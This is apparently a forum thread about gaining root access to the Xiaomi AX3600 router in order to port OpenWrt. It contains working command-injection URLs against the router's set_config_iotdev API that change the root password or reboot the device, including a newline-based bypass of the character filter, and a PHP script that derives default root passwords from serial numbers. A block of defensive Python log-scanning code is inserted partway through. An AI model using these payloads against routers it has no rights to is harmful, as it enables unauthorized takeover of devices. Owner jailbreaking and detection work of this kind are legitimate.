Adding OpenWrt support for Xiaomi AX3600 (Part 1)

It's easy to get ssh access. But it took me much time to change the root password. Finally, I managed to change it by using ld to execute the file: https://askubuntu.com/questions/354342/how-can-i-execute-a-file-without-execute-permissions

Ok, with ssh access now possible, and more and more folks seemingly interested, I am getting in on this early. I've been hunting around on Aliexpress, I can get 2x shipped via UPS Express Saver (7-10 days) for ~US$256. This will give me one for work and one for play. If anybody can point me to where it is cheaper, happy to know. BTW, there is clearly a serial header on board and the pinout is even silk-screened on:

https://www.acwifi.net/wp-content/uploads/2020/03/SAM_6424.jpg


Hello,
Where can one see the algorithm from which I can derive the root password?

Hi
You can use the following code to change the root password to "admin"

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

Thanks,

But I am also interested in the algorithm they used to create the root password based on device SN. If you can point me in the right direction.

#!/usr/bin/env php
<?php
// Salt is selected by the serial-number format (see get_salt below)
$salt = array(
    'r1d' => 'A2E371B0-B34B-48A5-8C40-A7133F3B5D88',
    'others' => 'd44fb0960aa0-a5e6-4a30-250f-6d2df50a'
);

isset($argv[1]) or die('Usage: ' . $argv[0] . " SN\n");
print_line(get_passwd($argv[1]));

function print_line($message) {
    echo $message . "\n";
}

// Password = first 8 hex characters of md5(SN . salt)
function get_passwd($sn) {
    return substr(md5($sn . get_salt($sn)), 0, 8);
}

// SNs without a '/' use the r1d salt; SNs with a '/' use the
// 'others' salt with its '-'-separated groups reversed
function get_salt($sn) {
    global $salt;
    if (false === strpos($sn, '/')) {
        return $salt['r1d'];
    } else {
        return swap_salt($salt['others']);
    }
}

// Reverse the order of the '-'-separated groups
function swap_salt($salt) {
    return implode('-', array_reverse(explode('-', $salt)));
}

link: https://blog.csdn.net/zhoujiazhao/article/details/102578244

Use it like this:

pi@DESKTOP-55HOBQT:/mnt/c/Users/someone/Desktop$ php a.php 10508/00771881


Thanks mate,
I appreciate it!

Is there anyway to help get openwrt to AX3600?
I may be able to handle programming, but I have no idea on how devices/kernels/drivers etc work and where I should start, how to test etc.

I am also in :slight_smile:


teardown
complete ttl contact
connect
copy boot log


secure boot fuse is not enabled :laughing:


Perhaps a dumb question, but I'm in the market for a new router/ap. I don't trust Xiaomi enough to make it my main device if I can't put OpenWRT on it. I am however, willing to run it temporarily behind my current router and block all traffic in their direction, until I can actually do so.

Does this finding mean that an OpenWRT build has a good chance of happening in the next 6-12 months?

Thanks!

It is way too early to answer this question, a lot can still go wrong and I haven't seen anyone even started working on a port for it. While chances aren't too bad, you won't know until someone at least submits a first approach as a pull request (even that won't give you any guarantees, until the patch set has actually been merged, but it would at least show you what would be possible - right now, it's still a va banque game).


LonGDikE,

Thanks for the tips to lead to getting SSH. On the unit I just received and downgraded to 1.0.17 - none of your commands as written worked. This appears to be due to the fact that this firmware performs some auto-filtering of characters that could lead to escape. Specifically ; & $ appear to not be permitted. After searching around a bit I came across this article:

In there it details that you can use newlines (%0A) [percent zero capital-A] instead of semicolons with some Xiaomi routers. With that, I was able to confirm escape via the following URL:

http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0Areboot%0A

Which, happily, rebooted the router. From there I was able to enable nvram SSH and then deleted the IF in /etc/init.d/dropbear by piping the dropbear contents to sed '135d' three times (which deleted the IF, the return 0, and the FI to stop the init file from keeping SSH off). I then used your command to change admin password, however, there is a password length requirement (8 characters seemed to do the trick).

I have confirmed that the %0Areboot%0A does not work on the 1.0.50 firmware (which is the latest as of this post).

Let me know if anyone would like more specifics or details. Happy to help to bring OpenWRT to this puppy.
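A defender-side way to spot requests of the kind described above in a router's HTTP access log, as an added example that is not from this thread or the OpenWrt project. It assumes a combined-format access log (the sample lines below are constructed, not real captures) and flags set_config_iotdev requests whose decoded query parameters carry shell metacharacters or line breaks, covering both the `;` form and the `%0A` form mentioned in the thread.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real captures); the request paths
# follow the URL shape discussed in the thread.
SAMPLE_LOG = """\
192.168.31.100 - - [01/Jan/2020:10:00:00 +0000] "GET /cgi-bin/luci/;stok=abc/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=u&ssid=HomeWifi HTTP/1.1" 200 55
192.168.31.100 - - [01/Jan/2020:10:00:05 +0000] "GET /cgi-bin/luci/;stok=abc/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=u&ssid=%0Areboot%0A HTTP/1.1" 200 55
192.168.31.100 - - [01/Jan/2020:10:00:09 +0000] "GET /cgi-bin/luci/;stok=abc/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=u&ssid=-h%3B%20echo%20hi HTTP/1.1" 200 55
192.168.31.100 - - [01/Jan/2020:10:00:12 +0000] "GET /cgi-bin/luci/;stok=abc/api/misystem/status HTTP/1.1" 200 55
"""

# Shell separators the thread says the firmware filters (; & $), plus
# pipes, backticks and the CR/LF separators the %0A bypass relies on.
SUSPICIOUS = re.compile("[;&$|`\n\r]")

# Pulls the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Only this endpoint is inspected; the ';stok=' in the LuCI path is a
# normal session token and must not be treated as a separator.
ENDPOINT_SUFFIX = "/api/misystem/set_config_iotdev"


def inspect_line(line):
    """Return (path, param, decoded_value) for a suspicious
    set_config_iotdev request, or None for a clean/irrelevant line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith(ENDPOINT_SUFFIX):
        return None
    # parse_qs percent-decodes values, so %0A and %3B become "\n" and ";"
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SUSPICIOUS.search(value):
                return (parts.path, key, value)
    return None


def scan(log_text):
    """Return all suspicious hits found in a block of log text."""
    return [h for h in (inspect_line(l) for l in log_text.splitlines()) if h]


if __name__ == "__main__":
    for path, key, value in scan(SAMPLE_LOG):
        print(f"suspicious {key}={value!r} on {path}")
```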

You can take a look here: Xiaomi AX3600 DTS
Someone is already trying to gather the necessary information (slh and efsg).

I gave the AX3600 to zhiping, soon...


esfg,

As you have serial port access, do you need anything from a persistent SSH perspective?

I do not know...
(MiWiFi/HiWiFi) Xiaomi can block at any time

Correct - the exploit I leveraged only works via downgrading to 1.0.17. As of 1.0.50 - it cannot be used as the method has been patched.

Yes, but we could still use 1.0.17 as a vector to get into the router and flash OpenWrt. Even as an install instruction it shouldn't be something difficult to do (as long as Xiaomi doesn't release firmware that blocks downgrading to 1.0.17).

What we need now is an OpenWrt build for this device, right?